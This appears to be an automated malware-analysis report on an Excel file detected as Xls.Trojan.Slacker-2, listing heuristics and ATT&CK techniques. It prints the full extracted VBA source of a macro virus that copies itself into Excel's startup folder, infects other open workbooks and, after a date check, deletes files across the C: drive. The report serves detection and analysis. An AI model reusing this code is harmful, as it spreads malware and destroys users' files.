MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros and CreateObject calls. The VBA script attempts to establish persistence by creating a copy of itself named 'Book1.' in the application's startup path. It also checks for 'bum.dll' and conditionally deletes files on the C: drive if the DLL is not present and the date is after July 1, 2001, indicating potential destructive behavior.
Heuristics 3
-
ClamAV: Xls.Trojan.Slacker-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Slacker-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2665 bytes |
SHA-256: f73606a23b43d3423b2110c840039fd64d47bd584dfb60edf4471946b5e9f8c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--bum04-->
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--bum04-->" Then
AW.DeleteLines 1, AW.CountofLines
AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
Bum (101)
End Sub
Function Bum(id As Integer)
check = False
If UCase(Dir("c:\windows\system\bum.dll")) = "BUM.DLL" Then check = True
If check = False And Date > #7/1/2001# Then
With Application.FileSearch
.NewSearch
.LookIn = "C:"
.FileType = 2
.SearchSubFolders = True
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.